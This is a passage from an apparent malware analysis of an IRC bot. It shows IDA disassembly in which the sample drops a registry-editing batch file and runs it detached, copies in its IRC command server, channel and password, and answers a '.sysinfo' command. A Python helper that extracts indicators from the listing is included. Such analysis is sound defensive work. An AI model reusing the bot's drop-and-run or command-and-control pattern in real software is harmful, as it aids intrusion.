...
ABC0:00401A78 push esi
ABC0:00401A79 push edi
ABC0:00401A7A mov ecx, 5C1h
ABC0:00401A7F mov esi, offset a@echoOffEchoRe ; "@echo off\r\nEcho REGEDIT4"...
ABC0:00401A84 lea edi, [ebp+Buffer]
ABC0:00401A8A lea eax, [ebp+CommandLine]
ABC0:00401A90 rep movsd
ABC0:00401A92 movsw
ABC0:00401A94 push offset aCA_bat ; "c:\\a.bat"
ABC0:00401A99 push eax ; char *
ABC0:00401A9A movsb
ABC0:00401A9B call _sprintf
...
ABC0:00401AD4 push eax ; nNumberOfBytesToWrite
ABC0:00401AD5 lea eax, [ebp+Buffer]
ABC0:00401ADB push eax ; lpBuffer
ABC0:00401ADC push edi ; hFile
ABC0:00401ADD call WriteFile
...
ABC0:00401B07 push ecx ; lpStartupInfo
ABC0:00401B08 push esi ; lpCurrentDirectory
ABC0:00401B09 inc eax
ABC0:00401B0A push esi ; lpEnvironment
ABC0:00401B0B push 28h ; dwCreationFlags
ABC0:00401B0D mov [ebp+StartupInfo.dwFlags], eax
ABC0:00401B10 push eax ; bInheritHandles
ABC0:00401B11 push esi ; lpThreadAttributes
ABC0:00401B12 lea eax, [ebp+CommandLine]
ABC0:00401B18 push esi ; lpProcessAttributes
ABC0:00401B19 push eax ; lpCommandLine
ABC0:00401B1A push esi ; lpApplicationName
ABC0:00401B1B mov [ebp+StartupInfo.wShowWindow], si
ABC0:00401B1F call CreateProcessA
Code 2 – The section that handles the connection to IRC.
ABC0:00403B5B push 7Fh ; size_t
ABC0:00403B5D push offset aTestirc1_sh1xy ; "testirc1.sh1xy2bg.NET"
ABC0:00403B62 push offset byte_47554C ; char *
ABC0:00403B67 call _strncpy
ABC0:00403B6C mov eax, dword_41C7B8
ABC0:00403B71 push 3Fh ; size_t
ABC0:00403B73 push offset aChalenge ; "#chalenge"
ABC0:00403B78 push offset byte_4755CC ; char *
ABC0:00403B7D mov ds:dword_47569C, eax
ABC0:00403B82 call _strncpy
ABC0:00403B87 add esp, 40h
ABC0:00403B8A push 3Fh ; size_t
ABC0:00403B8C push offset aHappy12 ; "happy12"
ABC0:00403B91 push offset byte_47560C ; char *
ABC0:00403B96 call _strncpy
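Both listings above (the batch-file drop and launch in Code 1, the IRC server, channel and password copied into globals in Code 2) are readable as a set of indicators: the string literals IDA annotates next to `offset` operands, the imported calls, and the `dwCreationFlags` value passed to CreateProcessA. The following Python script is an added triage helper, not part of the original analysis or of the sample; it parses IDA-style listing lines into those three pieces of information so the indicators can be pulled out for a detection write-up. The `LISTING` input is a constructed transcription of a few lines from this page, and the `CREATION_FLAGS` table holds the documented Win32 values for the bits involved.

```python
import re

# Constructed sample input: IDA-style lines transcribed from Code 1 and Code 2
# on this page, one instruction per line (raw string, so "\r\n" stays literal).
LISTING = r"""
ABC0:00401A7F mov esi, offset a@echoOffEchoRe ; "@echo off\r\nEcho REGEDIT4"
ABC0:00401A94 push offset aCA_bat ; "c:\\a.bat"
ABC0:00401A9B call _sprintf
ABC0:00401ADD call WriteFile
ABC0:00401B0B push 28h ; dwCreationFlags
ABC0:00401B1F call CreateProcessA
ABC0:00403B5D push offset aTestirc1_sh1xy ; "testirc1.sh1xy2bg.NET"
ABC0:00403B67 call _strncpy
ABC0:00403B73 push offset aChalenge ; "#chalenge"
ABC0:00403B8C push offset aHappy12 ; "happy12"
ABC0:00403B96 call _strncpy
"""

# seg:addr mnemonic operands ; comment   (comment optional)
LINE_RE = re.compile(
    r"^(?P<seg>\w+):(?P<addr>[0-9A-Fa-f]+)\s+(?P<mnem>\S+)\s*"
    r"(?P<ops>[^;]*?)\s*(?:;\s*(?P<cmt>.*?))?\s*$"
)

# Documented Win32 dwCreationFlags bits (subset relevant to this kind of listing).
CREATION_FLAGS = {
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000020: "NORMAL_PRIORITY_CLASS",
    0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x08000000: "CREATE_NO_WINDOW",
}


def parse_listing(text):
    """Turn listing lines into dicts; non-instruction lines such as '...' are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["addr"] = int(rec["addr"], 16)
        records.append(rec)
    return records


def parse_imm(token):
    """Parse an IDA immediate such as '28h' or '0' into an int."""
    token = token.strip()
    if token.lower().endswith("h"):
        return int(token[:-1], 16)
    return int(token, 0)


def extract_strings(records):
    """Distinct quoted literals IDA shows as comments (trailing '...' marks a truncated string)."""
    found = []
    for rec in records:
        m = re.fullmatch(r'"(.*)"(\.\.\.)?', rec["cmt"] or "")
        if m and m.group(1) not in found:
            found.append(m.group(1))
    return found


def extract_calls(records):
    """Distinct call targets in listing order (CRT names keep their leading underscore)."""
    calls = []
    for rec in records:
        if rec["mnem"].lower() == "call" and rec["ops"] not in calls:
            calls.append(rec["ops"])
    return calls


def decode_creation_flags(value):
    """Names of the known dwCreationFlags bits set in value, lowest bit first."""
    return [name for bit, name in sorted(CREATION_FLAGS.items()) if value & bit]


def creation_flags(records):
    """Decode the immediate pushed as dwCreationFlags, or None if the listing has none."""
    for rec in records:
        if rec["mnem"].lower() == "push" and rec["cmt"] == "dwCreationFlags":
            return decode_creation_flags(parse_imm(rec["ops"]))
    return None


def summarize(text):
    """Indicator summary of a listing: strings, API calls and process-creation flags."""
    recs = parse_listing(text)
    return {
        "strings": extract_strings(recs),
        "calls": extract_calls(recs),
        "creation_flags": creation_flags(recs),
    }


if __name__ == "__main__":
    for key, value in summarize(LISTING).items():
        print(f"{key}: {value}")
```

Run on the constructed input, the summary lists the batch-file template and path, the IRC server, channel and password, the four calls that implement the drop-and-run sequence, and decodes `28h` as `DETACHED_PROCESS | NORMAL_PRIORITY_CLASS`, which is the detail worth noting in a report: the dropped batch file is started without a console of its own.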
Code 3 – The output of the .sysinfo command issued via IRC chat.
<@anthony> .sysinfo
